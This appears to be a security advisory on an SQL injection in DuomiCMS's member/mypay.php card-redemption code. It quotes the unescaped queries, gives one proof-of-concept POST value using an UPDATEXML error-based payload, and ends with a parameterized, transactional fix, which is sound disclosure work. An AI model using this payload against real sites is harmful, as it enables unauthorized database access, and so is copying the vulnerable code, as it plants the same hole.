Vulnerable file: member/mypay.php (lines 14-40)
if(empty($_SESSION['duomi_user_id'])){
    showMsg("请先登录","login.php");
    exit();
} elseif($dm=='mypay'){
    $key=$_POST['cardkey'];
    if($key==""){showMsg("请输入充值卡号","-1");exit;}
    $pwd=$_POST['cardpwd'];
    if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}
    // Both values come straight from $_POST and are interpolated into SQL unescaped.
    $sqlt="SELECT * FROM duomi_card where ckey='$key'";
    // This second assignment overwrites the first: the card is looked up by cpwd alone.
    $sqlt="SELECT * FROM duomi_card where cpwd='$pwd'";
    $row1 = $dsql->GetOne($sqlt);
    if(!is_array($row1) OR $row1['status']<>0){
        showMsg("充值卡信息有误","-1");exit;
    }else{
        $uname=$_SESSION['duomi_user_name'];
        $points=$row1['climit'];
        // The same unescaped $key and $pwd are reused in the UPDATE statements.
        $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'");
        $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'");
        $dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'");
        showMsg("恭喜!充值成功!","mypay.php");exit;
    }
} else {
    // ... (remaining branches of the file are not part of this excerpt)
Here the "cardpwd" variable is passed into the database query via POST without any filtering, which causes SQL injection. The PoC is constructed as follows (note that a registered, logged-in user is required; see lines 1-17 of the file for details):
http://localhost/member/mypay.php?dm=mypay POST:cardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1
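For comparison, a hardened rewrite of the same branch, added here as an example and not part of the DuomiCMS code. It assumes a PDO connection in $pdo (instead of the project's $dsql wrapper) and the table and column names shown above; the card is matched on both ckey and cpwd with bound parameters, and the lookup and updates run in one transaction so a card cannot be redeemed twice.

```php
<?php
// Added example, not the project's code. Assumes $pdo is a PDO connection opened with
// PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION and PDO::ATTR_EMULATE_PREPARES => false,
// and the duomi_card / duomi_member schema referenced in the advisory.
function redeemCard(PDO $pdo, string $uname, string $key, string $pwd): bool
{
    if ($key === '' || $pwd === '') {
        return false;
    }
    $pdo->beginTransaction();
    try {
        // One lookup that requires BOTH the card number and its password to match.
        // The original overwrote $sqlt and matched on cpwd alone, with the value inlined in SQL.
        $stmt = $pdo->prepare(
            'SELECT climit FROM duomi_card WHERE ckey = ? AND cpwd = ? AND status = 0 FOR UPDATE'
        );
        $stmt->execute([$key, $pwd]);
        $card = $stmt->fetch(PDO::FETCH_ASSOC);
        if ($card === false) {
            $pdo->rollBack();
            return false;
        }
        // Consume the card in a single UPDATE keyed on both columns; rowCount() guards
        // against a concurrent redemption of the same card between SELECT and UPDATE.
        $upd = $pdo->prepare(
            'UPDATE duomi_card SET usetime = NOW(), uname = ?, status = 1 '
            . 'WHERE ckey = ? AND cpwd = ? AND status = 0'
        );
        $upd->execute([$uname, $key, $pwd]);
        if ($upd->rowCount() !== 1) {
            $pdo->rollBack();
            return false;
        }
        $pts = $pdo->prepare('UPDATE duomi_member SET points = points + ? WHERE username = ?');
        $pts->execute([(int) $card['climit'], $uname]);
        $pdo->commit();
        return true;
    } catch (Throwable $e) {
        $pdo->rollBack();
        throw $e;
    }
}

// Handler usage (hypothetical wiring into the mypay branch):
// $ok = redeemCard($pdo, $_SESSION['duomi_user_name'],
//                  $_POST['cardkey'] ?? '', $_POST['cardpwd'] ?? '');
// if ($ok) { showMsg("恭喜!充值成功!", "mypay.php"); } else { showMsg("充值卡信息有误", "-1"); }
```

With bound parameters the submitted cardpwd value is sent to MySQL as data, so the UPDATEXML payload above is simply compared against the cpwd column and matches nothing.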